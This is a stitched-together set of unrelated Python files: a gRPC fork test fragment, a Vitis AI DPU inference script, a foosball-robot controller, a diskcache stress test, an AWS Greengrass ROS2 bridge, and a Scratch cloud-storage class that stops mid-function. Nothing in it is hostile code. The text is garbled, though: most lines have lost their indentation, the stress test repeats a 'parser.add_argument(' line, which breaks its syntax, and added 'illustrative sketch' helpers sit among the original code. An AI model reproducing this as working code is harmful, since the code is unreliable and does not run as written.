child_process.finish()
def _in_progress_bidi_continue_call(channel):
def child_target(parent_bidi_call, parent_channel, args):
stub = test_pb2_grpc.TestServiceStub(parent_channel)
try:
_async_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
inherited_code = parent_bidi_call.code()
inherited_details = parent_bidi_call.details()
if inherited_code != grpc.StatusCode.CANCELLED:
raise ValueError(
'Expected inherited code CANCELLED, got %s' % inherited_code)
if inherited_details != 'Channel closed due to fork':
raise ValueError(
'Expected inherited details Channel closed due to fork, got %s'
% inherited_details)
# Don't run child_target after closing the parent call, as the call may have
# received a status from the server before fork occurs.
_ping_pong_with_child_processes_after_first_response(
channel, None, child_target, run_after_close=False)
def _in_progress_bidi_same_channel_async_call(channel):
def child_target(parent_bidi_call, parent_channel, args):
stub = test_pb2_grpc.TestServiceStub(parent_channel)
try:
_async_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
_ping_pong_with_child_processes_after_first_response(
channel, None, child_target)
def _in_progress_bidi_same_channel_blocking_call(channel):
def child_target(parent_bidi_call, parent_channel, args):
stub = test_pb2_grpc.TestServiceStub(parent_channel)
try:
_blocking_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
_ping_pong_with_child_processes_after_first_response(
channel, None, child_target)
def _in_progress_bidi_new_channel_async_call(channel, args):
def child_target(parent_bidi_call, parent_channel, args):
channel = _channel(args)
stub = test_pb2_grpc.TestServiceStub(channel)
_async_unary(stub)
_ping_pong_with_child_processes_after_first_response(
channel, args, child_target)
def _in_progress_bidi_new_channel_blocking_call(channel, args):
def child_target(parent_bidi_call, parent_channel, args):
channel = _channel(args)
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
_ping_pong_with_child_processes_after_first_response(
channel, args, child_target)
@enum.unique
class TestCase(enum.Enum):
CONNECTIVITY_WATCH = 'connectivity_watch'
CLOSE_CHANNEL_BEFORE_FORK = 'close_channel_before_fork'
ASYNC_UNARY_SAME_CHANNEL = 'async_unary_same_channel'
ASYNC_UNARY_NEW_CHANNEL = 'async_unary_new_channel'
BLOCKING_UNARY_SAME_CHANNEL = 'blocking_unary_same_channel'
BLOCKING_UNARY_NEW_CHANNEL = 'blocking_unary_new_channel'
IN_PROGRESS_BIDI_CONTINUE_CALL = 'in_progress_bidi_continue_call'
IN_PROGRESS_BIDI_SAME_CHANNEL_ASYNC_CALL = 'in_progress_bidi_same_channel_async_call'
IN_PROGRESS_BIDI_SAME_CHANNEL_BLOCKING_CALL = 'in_progress_bidi_same_channel_blocking_call'
IN_PROGRESS_BIDI_NEW_CHANNEL_ASYNC_CALL = 'in_progress_bidi_new_channel_async_call'
IN_PROGRESS_BIDI_NEW_CHANNEL_BLOCKING_CALL = 'in_progress_bidi_new_channel_blocking_call'
def run_test(self, args):
_LOGGER.info("Running %s", self)
channel = _channel(args)
if self is TestCase.ASYNC_UNARY_SAME_CHANNEL:
_async_unary_same_channel(channel)
elif self is TestCase.ASYNC_UNARY_NEW_CHANNEL:
_async_unary_new_channel(channel, args)
elif self is TestCase.BLOCKING_UNARY_SAME_CHANNEL:
_blocking_unary_same_channel(channel)
elif self is TestCase.BLOCKING_UNARY_NEW_CHANNEL:
_blocking_unary_new_channel(channel, args)
elif self is TestCase.CLOSE_CHANNEL_BEFORE_FORK:
_close_channel_before_fork(channel, args)
elif self is TestCase.CONNECTIVITY_WATCH:
_connectivity_watch(channel, args)
elif self is TestCase.IN_PROGRESS_BIDI_CONTINUE_CALL:
_in_progress_bidi_continue_call(channel)
elif self is TestCase.IN_PROGRESS_BIDI_SAME_CHANNEL_ASYNC_CALL:
_in_progress_bidi_same_channel_async_call(channel)
elif self is TestCase.IN_PROGRESS_BIDI_SAME_CHANNEL_BLOCKING_CALL:
_in_progress_bidi_same_channel_blocking_call(channel)
elif self is TestCase.IN_PROGRESS_BIDI_NEW_CHANNEL_ASYNC_CALL:
_in_progress_bidi_new_channel_async_call(channel, args)
elif self is TestCase.IN_PROGRESS_BIDI_NEW_CHANNEL_BLOCKING_CALL:
_in_progress_bidi_new_channel_blocking_call(channel, args)
else:
raise NotImplementedError(
'Test case "%s" not implemented!' % self.name)
channel.close()
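# Illustrative sketch (not part of the original test module): each TestCase value maps
# its enum string onto one of the helpers above, so a driver can exercise every case
# with a loop like the one below (here `args` stands for the parsed command-line
# arguments the individual helpers expect).
def run_all_cases(args):
    for case in TestCase:
        case.run_test(args)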
|
app_mt_aidea.py
|
# Copyright 2021 Industrial Technology Research Institute
#
# Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTICE: This file has been modified by Industrial Technology Research Institute for AIdea "FPGA Edge AI – AOI Defect
# Classification" competition
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import os
import pathlib
import xir
import threading
import time
import sys
import argparse
divider = '------------------------------------'
def preprocess_fn(image_path):
'''
Image pre-processing.
Rearranges from BGR to RGB then normalizes to range 0:1
input arg: path of image file
return: numpy array
'''
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image / 255.0
return image
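# Illustrative sketch (not part of the original script): preprocess_fn assumes the images
# on disk already match the model's input height/width, since runDPU reshapes them
# directly into the input tensor. If they did not, a resize step would be needed; the
# target size below is a hypothetical example, not a value from the original model.
def preprocess_fn_resized(image_path, target_size=(224, 224)):
    image = cv2.imread(image_path)
    image = cv2.resize(image, target_size)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    return image / 255.0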
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (root_subgraph is not None), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def runDPU(id, start, dpu, img):
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if count + batchSize <= n_of_images:
runSize = batchSize
else:
runSize = n_of_images - count
'''prepare batch input/output '''
outputData = []
inputData = []
inputData = [np.empty(input_ndim, dtype=np.float32, order="C")]
outputData = [np.empty(output_ndim, dtype=np.float32, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData, outputData)
dpu.wait(job_id)
'''store output vectors '''
for j in range(runSize):
out_q[write_index] = np.argmax((outputData[0][j]))
write_index += 1
count = count + runSize
def app(image_dir, threads, model):
listimage = sorted(os.listdir(image_dir))
runTotal = len(listimage)
global out_q
out_q = [None] * runTotal
g = xir.Graph.deserialize(model)
subgraphs = get_child_subgraph_dpu(g)
all_dpu_runners = []
for i in range(threads):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
''' preprocess images '''
print(divider)
print('Pre-processing', runTotal, 'images...')
img = []
for i in range(runTotal):
path = os.path.join(image_dir, listimage[i])
img.append(preprocess_fn(path))
'''run threads '''
print('Starting', threads, 'threads...')
threadAll = []
start = 0
for i in range(threads):
if (i == threads - 1):
end = len(img)
else:
end = start + (len(img) // threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i, start, all_dpu_runners[i], in_q))
threadAll.append(t1)
start = end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print(divider)
print("Throughput=%.2f fps, total frames = %.0f, time=%.4f seconds" % (fps, runTotal, timetotal))
''' post-processing '''
classes = ['0', '1', '2', '3', '4', '5']
print('Post-processing', len(out_q), 'images..')
with open('/output/result.csv', 'w') as f:
f.write(f'ID,Label\n')
for i in range(len(out_q)):
prediction = classes[out_q[i]]
f.write(f'{listimage[i]},{prediction}\n')
print(divider)
with open('/output/time_info.txt', 'w') as f:
f.write(f'FPS = {fps}\n')
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir', type=str, default='images', help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads', type=int, default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str, default='customcnn.xmodel',
help='Path of xmodel. Default is customcnn.xmodel')
args = ap.parse_args()
print(divider)
print('Command line options:')
print(' --image_dir : ', args.image_dir)
print(' --threads : ', args.threads)
print(' --model : ', args.model)
app(args.image_dir, args.threads, args.model)
if __name__ == '__main__':
main()
|
Application.py
|
#!/usr/bin/env python
import cv2
import logging
import pygame
import numpy as np
from multiprocessing import Process, Queue
import sys
import os
import tensorflow as tf
import yaml
from kicker.agents.neural_net_agent import NeuralNetAgent
from kicker.opcua_motor import MotorController
from kicker import ConsoleView, Helper
from kicker.agents import KeyboardAgent, RandomAgent
from kicker.storage import Storage, storage_worker
from kicker.image import add_ball, Analyzer
pygame.init()
pygame.font.init()
logging.basicConfig(filename='kicker.log', level=logging.DEBUG,
format='%(asctime)s %(filename)s %(lineno)d %(levelname)s %(message)s')
logging.info("Fussball ist wie Schach nur ohne Wuerfel")
import keras.backend.tensorflow_backend as KTF
def get_session(gpu_fraction=0.4):
num_threads = os.environ.get('OMP_NUM_THREADS')
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction)
    if num_threads:
        # OMP_NUM_THREADS comes from the environment as a string; TensorFlow expects an int.
        return tf.Session(config=tf.ConfigProto(
            gpu_options=gpu_options, intra_op_parallelism_threads=int(num_threads)))
else:
return tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
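# Illustrative sketch (not part of the original script): get_session() above is defined but
# never called; presumably it was meant to be registered with the Keras backend, roughly
# like the helper below. The 0.4 fraction mirrors the value used elsewhere in this file.
def apply_gpu_fraction_session(gpu_fraction=0.4):
    # Register the memory-fraction-limited session from get_session() with Keras.
    KTF.set_session(get_session(gpu_fraction))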
def set_keras_gpu_use(percentage):
    # Cap the fraction of GPU memory TensorFlow may allocate and let usage grow lazily.
    # (The original version ignored the `percentage` argument.)
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    config.gpu_options.per_process_gpu_memory_fraction = percentage
    sess = tf.Session(config=config)
    KTF.set_session(sess)
set_keras_gpu_use(0.4)
def read_config():
with open('config.yml', 'r') as f:
        return yaml.safe_load(f)
class Application(object):
def __init__(self, agent, enable_storage=True):
self.screen = None
        self.screen_width = 1024
        self.screen_height = 800
self.view = ConsoleView()
self.video = cv2.VideoCapture(1)
self.inputs = [0, ] * 8
self.agent = agent
self.config = read_config()
self.motor = MotorController()
self.helper = Helper()
self.enable_storage = enable_storage
if self.enable_storage:
self.storage_queue = Queue()
self.storage_process = Process(
target=storage_worker, args=(self.storage_queue, self.config))
self.storage_process.start()
self.analyzer = Analyzer(self.config)
def submit_inputs(self):
        # self.view.renderView(self.inputs)
self.motor.control(self.inputs)
def run(self):
self.screen = pygame.display.set_mode(
(self.screen_width, self.screen_height))
while True:
# logging.debug("Start event loop")
if self.video.grab():
r, f = self.video.retrieve()
# self.possible_moves = self.analyzer.get_possible_moves(f)
# img, c_x, c_y = add_ball(f[:])
img = f[:]
# img = self.analyzer.add_circles_to_limiters(img[:, :, ::-1])
img = self.analyzer.extract_table(
img, (self.screen_width, self.screen_height))
# img = cv2.resize(img, (self.screen_width, self.screen_height))
self.agent.new_frame(f)
if self.enable_storage:
self.storage_queue.put((f, self.inputs))
logging.debug("start updating window")
pygame.surfarray.blit_array(
self.screen, np.swapaxes(img[::-1, ::-1, ::-1], 0, 1))
# pygame.surfarray.blit_array(self.screen, img)
pygame.display.update()
# logging.debug("start processing events")
for event in pygame.event.get():
if event.type == pygame.QUIT:
# stop_all()
if self.enable_storage:
self.storage_queue.put((None, None))
self.storage_process.join()
self.motor.disconnect()
pygame.quit()
sys.exit()
self.agent.handle_event(event)
inputs = self.agent.get_inputs()
if inputs is not None:
# self.inputs = self.helper.handle_forbidden_moves(self.possible_moves, inputs)
self.inputs = inputs
self.submit_inputs()
if __name__ == '__main__':
# agent = RandomAgent()
# agent = KeyboardAgent()
agent = NeuralNetAgent()
program = Application(agent, enable_storage=False)
program.run()
|
stress_test_fanout.py
|
"Stress test diskcache.core.Cache."
from __future__ import print_function
import collections as co
from diskcache import FanoutCache, UnknownFileWarning, EmptyDirWarning
import multiprocessing as mp
import os
import random
import shutil
import sys
import threading
import time
import warnings
try:
import Queue
except ImportError:
import queue as Queue
if sys.hexversion < 0x03000000:
range = xrange
import cPickle as pickle
else:
import pickle
from .utils import display
OPERATIONS = int(1e4)
GET_AVERAGE = 100
KEY_COUNT = 10
DEL_CHANCE = 0.1
WARMUP = 10
EXPIRE = None
def make_keys():
def make_int():
return random.randrange(int(1e9))
def make_long():
value = random.randrange(int(1e9))
return value << 64
def make_unicode():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size))
size = random.randint(1, int(200 / 13))
return word * size
def make_bytes():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size)).encode('utf-8')
size = random.randint(1, int(200 / 13))
return word * size
def make_float():
return random.random()
def make_object():
return (make_float(),) * random.randint(1, 20)
funcs = [make_int, make_long, make_unicode, make_bytes, make_float, make_object]
while True:
func = random.choice(funcs)
yield func()
def make_vals():
def make_int():
return random.randrange(int(1e9))
def make_long():
value = random.randrange(int(1e9))
return value << 64
def make_unicode():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size))
size = random.randint(1, int(2 ** 16 / 13))
return word * size
def make_bytes():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size)).encode('utf-8')
size = random.randint(1, int(2 ** 16 / 13))
return word * size
def make_float():
return random.random()
def make_object():
return [make_float()] * random.randint(1, int(2e3))
funcs = [make_int, make_long, make_unicode, make_bytes, make_float, make_object]
while True:
func = random.choice(funcs)
yield func()
def key_ops():
keys = make_keys()
vals = make_vals()
key = next(keys)
while True:
value = next(vals)
yield 'set', key, value
for _ in range(int(random.expovariate(1.0 / GET_AVERAGE))):
yield 'get', key, value
if random.random() < DEL_CHANCE:
yield 'delete', key, None
def all_ops():
keys = [key_ops() for _ in range(KEY_COUNT)]
for _ in range(OPERATIONS):
ops = random.choice(keys)
yield next(ops)
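# Illustrative sketch (not part of the original benchmark): every item yielded by
# all_ops() is an (action, key, value) triplet — ('set', key, value), ('get', key, value)
# or ('delete', key, None). The helper below just tallies the action mix produced for a
# given seed; it is only an inspection aid.
def summarize_ops(seed=0):
    random.seed(seed)
    counts = co.Counter(action for action, _key, _value in all_ops())
    return dict(counts)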
def worker(queue, eviction_policy, processes, threads):
timings = {'get': [], 'set': [], 'delete': []}
cache = FanoutCache('tmp', eviction_policy=eviction_policy)
for index, (action, key, value) in enumerate(iter(queue.get, None)):
start = time.time()
if action == 'set':
cache.set(key, value, expire=EXPIRE)
elif action == 'get':
result = cache.get(key)
else:
assert action == 'delete'
cache.delete(key)
stop = time.time()
if action == 'get' and processes == 1 and threads == 1 and EXPIRE is None:
assert result == value
if index > WARMUP:
timings[action].append(stop - start)
queue.put(timings)
cache.close()
def dispatch(num, eviction_policy, processes, threads):
with open('input-%s.pkl' % num, 'rb') as reader:
process_queue = pickle.load(reader)
thread_queues = [Queue.Queue() for _ in range(threads)]
subthreads = [
threading.Thread(
target=worker, args=(thread_queue, eviction_policy, processes, threads)
) for thread_queue in thread_queues
]
for index, triplet in enumerate(process_queue):
thread_queue = thread_queues[index % threads]
thread_queue.put(triplet)
for thread_queue in thread_queues:
thread_queue.put(None)
start = time.time()
for thread in subthreads:
thread.start()
for thread in subthreads:
thread.join()
stop = time.time()
timings = {'get': [], 'set': [], 'delete': [], 'self': (stop - start)}
for thread_queue in thread_queues:
data = thread_queue.get()
for key in data:
timings[key].extend(data[key])
with open('output-%s.pkl' % num, 'wb') as writer:
pickle.dump(timings, writer, protocol=2)
def percentile(sequence, percent):
if not sequence:
return None
values = sorted(sequence)
if percent == 0:
return values[0]
pos = int(len(values) * percent) - 1
return values[pos]
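# Worked example (not part of the original benchmark): percentile() indexes into the
# sorted values, so for 100 evenly spaced samples the 0.90 percentile is simply the
# 90th smallest value.
def _percentile_example():
    values = list(range(1, 101))
    assert percentile(values, 0.90) == 90
    assert percentile(values, 0) == 1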
def stress_test(create=True, delete=True,
eviction_policy=u'least-recently-stored',
processes=1, threads=1):
shutil.rmtree('tmp', ignore_errors=True)
if processes == 1:
# Use threads.
func = threading.Thread
else:
func = mp.Process
subprocs = [
func(target=dispatch, args=(num, eviction_policy, processes, threads))
for num in range(processes)
]
if create:
operations = list(all_ops())
process_queue = [[] for _ in range(processes)]
for index, ops in enumerate(operations):
process_queue[index % processes].append(ops)
for num in range(processes):
with open('input-%s.pkl' % num, 'wb') as writer:
pickle.dump(process_queue[num], writer, protocol=2)
for process in subprocs:
process.start()
for process in subprocs:
process.join()
with FanoutCache('tmp') as cache:
warnings.simplefilter('error')
warnings.simplefilter('ignore', category=UnknownFileWarning)
warnings.simplefilter('ignore', category=EmptyDirWarning)
cache.check()
timings = {'get': [], 'set': [], 'delete': [], 'self': 0.0}
for num in range(processes):
with open('output-%s.pkl' % num, 'rb') as reader:
data = pickle.load(reader)
for key in data:
timings[key] += data[key]
if delete:
for num in range(processes):
os.remove('input-%s.pkl' % num)
os.remove('output-%s.pkl' % num)
display(eviction_policy, timings)
shutil.rmtree('tmp', ignore_errors=True)
def stress_test_lru():
"Stress test least-recently-used eviction policy."
stress_test(eviction_policy=u'least-recently-used')
def stress_test_lfu():
"Stress test least-frequently-used eviction policy."
stress_test(eviction_policy=u'least-frequently-used')
def stress_test_none():
"Stress test 'none' eviction policy."
stress_test(eviction_policy=u'none')
def stress_test_mp():
"Stress test multiple threads and processes."
stress_test(processes=4, threads=4)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
'-n', '--operations', type=float, default=OPERATIONS,
help='Number of operations to perform',
)
parser.add_argument(
'-g', '--get-average', type=float, default=GET_AVERAGE,
help='Expected value of exponential variate used for GET count',
)
parser.add_argument(
'-k', '--key-count', type=float, default=KEY_COUNT,
help='Number of unique keys'
)
parser.add_argument(
'-d', '--del-chance', type=float, default=DEL_CHANCE,
help='Likelihood of a key deletion',
)
parser.add_argument(
'-w', '--warmup', type=float, default=WARMUP,
help='Number of warmup operations before timings',
)
parser.add_argument(
'-e', '--expire', type=float, default=EXPIRE,
help='Number of seconds before key expires',
)
parser.add_argument(
'-t', '--threads', type=int, default=1,
help='Number of threads to start in each process',
)
parser.add_argument(
'-p', '--processes', type=int, default=1,
help='Number of processes to start',
)
parser.add_argument(
'-s', '--seed', type=int, default=0,
help='Random seed',
)
parser.add_argument(
'--no-create', action='store_false', dest='create',
help='Do not create operations data',
)
parser.add_argument(
'--no-delete', action='store_false', dest='delete',
help='Do not delete operations data',
)
parser.add_argument(
    parser.add_argument(
        '-v', '--eviction-policy', type=str,
        default=u'least-recently-stored',
    )
args = parser.parse_args()
OPERATIONS = int(args.operations)
GET_AVERAGE = int(args.get_average)
KEY_COUNT = int(args.key_count)
DEL_CHANCE = args.del_chance
WARMUP = int(args.warmup)
EXPIRE = args.expire
random.seed(args.seed)
start = time.time()
stress_test(
create=args.create,
delete=args.delete,
eviction_policy=args.eviction_policy,
processes=args.processes,
threads=args.threads,
)
end = time.time()
print('Total wall clock time: %.3f seconds' % (end - start))
|
app.py
|
#!/usr/bin/env python3
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED,INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import rclpy
from rclpy.node import Node
import json
from std_msgs.msg import String
from functools import partial
import threading
import awsiot.greengrasscoreipc as gg
import awsiot.greengrasscoreipc.model as model
class GreengrassBridge(Node):
ros_publishers = {}
iot_publishers = {}
def __init__(self):
super().__init__("greengrass_bridge")
self.declare_parameters(
namespace="",
parameters=[
("iot_topics", []),
("ros_topics", []),
("timeout", 10)
]
)
self.get_logger().info("Initializing Greengrass ROS2 Bridge...")
try:
self.iot_topics = self.get_parameter("iot_topics")._value
self.ros_topics = self.get_parameter("ros_topics")._value
except:
self.iot_topics = []
self.ros_topics = []
self.get_logger().error("Invalid ros topics / iot topics arguments.")
self.get_logger().info(" ==== ROS TOPICS ====")
self.get_logger().info(str(self.ros_topics))
self.get_logger().info(" ==== IoT TOPICS ====")
self.get_logger().info(str(self.iot_topics))
self.timeout = self.get_parameter("timeout")._value
self.get_logger().info("Timeout: %s" % self.timeout)
self.ipc_client = gg.connect()
self.init_subscribers()
def init_subscribers(self):
for topic in self.iot_topics:
self.get_logger().info("Setting up IoT subscriber for %s" % topic)
self.ros_publishers[topic] = self.create_publisher(String, topic, 10)
handler = gg.client.SubscribeToIoTCoreStreamHandler()
handler.on_stream_event = self.execute_publish_thread
operation = self.ipc_client.new_subscribe_to_iot_core(stream_handler=handler)
response = operation.activate(model.SubscribeToIoTCoreRequest(
topic_name=topic.strip(),
qos=model.QOS.AT_LEAST_ONCE
))
response.result()
self.get_logger().info("Subscribed to iot topic %s" % topic.strip())
for ros_topic in self.ros_topics:
self.get_logger().info("Setting up ROS Topic subscriber for %s" % ros_topic)
self.iot_publishers[ros_topic] = partial(self.publish_to_iot, ros_topic)
self.create_subscription(String, ros_topic.strip(), self.iot_publishers[ros_topic], 1)
self.get_logger().info("Subscribed to ros topic %s" % ros_topic.strip())
def execute_publish_thread(self, event: model.IoTCoreMessage):
try:
self.get_logger().info("Kicking off the thread.")
t = threading.Thread(target = self.publish_to_ros2, args=[event])
t.start()
except Exception as ex:
self.get_logger().error(str(ex))
def publish_to_ros2(self, event: model.IoTCoreMessage):
try:
message = str(event.message.payload, "utf-8")
topic = event.message.topic_name
self.get_logger().info("Received message on topic %s from AWS IoT Core %s" % (message, topic))
ros_msg = String()
ros_msg.data = message
self.ros_publishers[topic].publish(ros_msg)
self.get_logger().info("Published message: %s to topic %s" % (message, topic))
except Exception as ex:
self.get_logger().error(str(ex))
def publish_to_iot(self, topic, msg):
self.get_logger().info("Publishing message to the cloud: %s" % msg.data)
operation = self.ipc_client.new_publish_to_iot_core()
operation.activate(model.PublishToIoTCoreRequest(
topic_name=topic,
qos=model.QOS.AT_LEAST_ONCE,
payload=json.dumps(msg.data).encode(),
))
future = operation.get_response()
future.result(self.timeout)
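# Illustrative sketch (not part of the original bridge): publish_to_iot wraps the ROS
# String payload with json.dumps before sending, so a message whose data field is
# 'hello' reaches AWS IoT Core as the JSON string '"hello"'. This helper mirrors only
# that encoding step, without touching the Greengrass IPC client.
def encode_iot_payload(msg):
    return json.dumps(msg.data).encode()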
def main(args=None):
rclpy.init(args=args)
node = GreengrassBridge()
try:
rclpy.spin(node)
except KeyboardInterrupt:
pass
node.get_logger().info("Closing ROS Bridge")
node.destroy_node()
if __name__ == "__main__":
main()
|
scCloudStorage.py
|
"""
The Cloud Storage File.
"""
import time
import json
import string
from threading import Thread
from scratchconnect.CloudConnection import CloudConnection
from scratchconnect.scEncoder import Encoder
SUPPORTED_CHARS = list(string.ascii_uppercase + string.ascii_lowercase + string.digits + string.punctuation + ' ')
_VARIABLE_LENGTH = 256
_VARIABLES = ['Response1', 'Response2', 'Response3', 'Response4', 'Response5', 'Response6', 'Response7', 'Response8']
_FAIL = 0
_SUCCESS = 1
_ACCESS_DENIED = 2
_ALREADY_EXIST = 3
_DOESNT_EXIST = 4
class CloudStorage:
def __init__(self, file_name, rewrite_file, project_id, client_username, csrf_token, session_id, token,
edit_access):
self.project_id = project_id
self.client_username = client_username
self.csrf_token = csrf_token
self.session_id = session_id
self.token = token
self.file_name = f"{file_name}.json"
self.rewrite_file = rewrite_file
self._make_file()
self.edit_access = edit_access
self.edit_access.append(client_username)
self._connect_cloud()
self.encoder = Encoder()
self.loop = True
def _connect_cloud(self):
self.cloud = CloudConnection(self.project_id, self.client_username, self.csrf_token, self.session_id,
self.token)
def _get_request(self):
return self._get_cloud_variable_data('Request')[0]
def _reset_request_var(self):
try:
self.cloud.set_cloud_variable(variable_name='Request', value=0)
except: # lgtm [py/catch-base-exception]
time.sleep(1)
self._connect_cloud()
def _set_response_info(self, status_code):
try:
self.cloud.set_cloud_variable(variable_name='Response Info',
value=self.encoder.encode_list([status_code]))
except: # lgtm [py/catch-base-exception]
time.sleep(1)
self._connect_cloud()
def _set_cloud_var(self, name, value):
try:
return self.cloud.set_cloud_variable(variable_name=name, value=value)
except: # lgtm [py/catch-base-exception]
time.sleep(1)
self._connect_cloud()
def start_cloud_loop(self, update_time=5, print_requests=False):
t = Thread(target=self._start_loop, args=(update_time, print_requests,))
t.start()
def _start_loop(self, update_time, pr):
while self.loop:
try:
if pr:
print("Checking for new request...")
r = self._get_request()
request = self.encoder.decode_list(str(r[0]))
if len(request) > 1:
request_type = request[0]
request_name = request[1]
if request_name == "":
request_name = None
user = r[1]
if pr:
print('-' * 30)
print(f"New Request {request_type}:")
print(f"\tType: {request_type}")
print(f"\tName: {request_name}")
print(f"\tUser: {user}")
print('-' * 30)
if request_type == "CREATE":
if user in self.edit_access:
file = self._open_file(mode='r+')
data = json.loads(file.read())
file.close()
if request_name in data:
self._set_response_info(status_code=_ALREADY_EXIST)
self._reset_request_var()
continue
else:
data[request_name] = 0
file = self._open_file(mode='w')
file.write(json.dumps(data))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
else:
self._set_response_info(status_code=_ACCESS_DENIED)
self._reset_request_var()
if request_type == "DELETE":
if user in self.edit_access:
file = self._open_file(mode='r+')
data = json.loads(file.read())
file.close()
if request_name not in data:
self._set_response_info(status_code=_DOESNT_EXIST)
self._reset_request_var()
continue
else:
del data[request_name]
file = self._open_file(mode='w')
file.write(json.dumps(data))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
else:
self._set_response_info(status_code=_ACCESS_DENIED)
self._reset_request_var()
if request_type == "DELETE_ALL":
if user in self.edit_access:
file = self._open_file(mode='w')
file.write(json.dumps({}))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - Success!")
else:
self._set_response_info(status_code=_ACCESS_DENIED)
self._reset_request_var()
if request_type == "GET":
d = self._get_data(request_name)
if d is None:
self._set_response_info(status_code=_DOESNT_EXIST)
self._reset_request_var()
continue
else:
data = self.encoder.encode(str(d))
divided_data = self._divide_code(data, _VARIABLE_LENGTH)
i = 0
while i < len(divided_data):
if divided_data[i] == '':
if self._set_cloud_var(name=_VARIABLES[i], value='') is False:
continue
else:
if self._set_cloud_var(name=_VARIABLES[i], value=divided_data[i]) is False:
continue
i += 1
time.sleep(0.5)
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
if request_type == "SET":
v = ""
i = 0
while i < len(_VARIABLES):
d = self.cloud.get_cloud_variable_value(_VARIABLES[i], limit=3)
if len(d) > 0:
v += d[0]
i += 1
time.sleep(0.1)
value = self.encoder.decode(v)
file = self._open_file(mode='r+')
data = json.loads(file.read())
file.close()
if request_name in data:
data[request_name] = value
else:
self._set_response_info(status_code=_DOESNT_EXIST)
self._reset_request_var()
continue
file = self._open_file(mode='w')
file.write(json.dumps(data))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
time.sleep(update_time)
except KeyboardInterrupt:
pass
def _make_file(self):
if self.rewrite_file:
file = open(self.file_name, 'w+')
else:
file = open(self.file_name, 'a+')
t_file = open(self.file_name, 'r')
if len(t_file.read()) == 0:
file.write(json.dumps({}))
t_file.close()
file.close()
def _open_file(self, mode='r'):
file = open(self.file_name, mode)
return file
def _get_data(self, key):
try:
file = json.loads(self._open_file(mode='r').read())
return file[key]
except KeyError:
return None
def _get_cloud_variable_data(self, variable_name, limit=100):
if str(variable_name.strip())[0] != "☁":
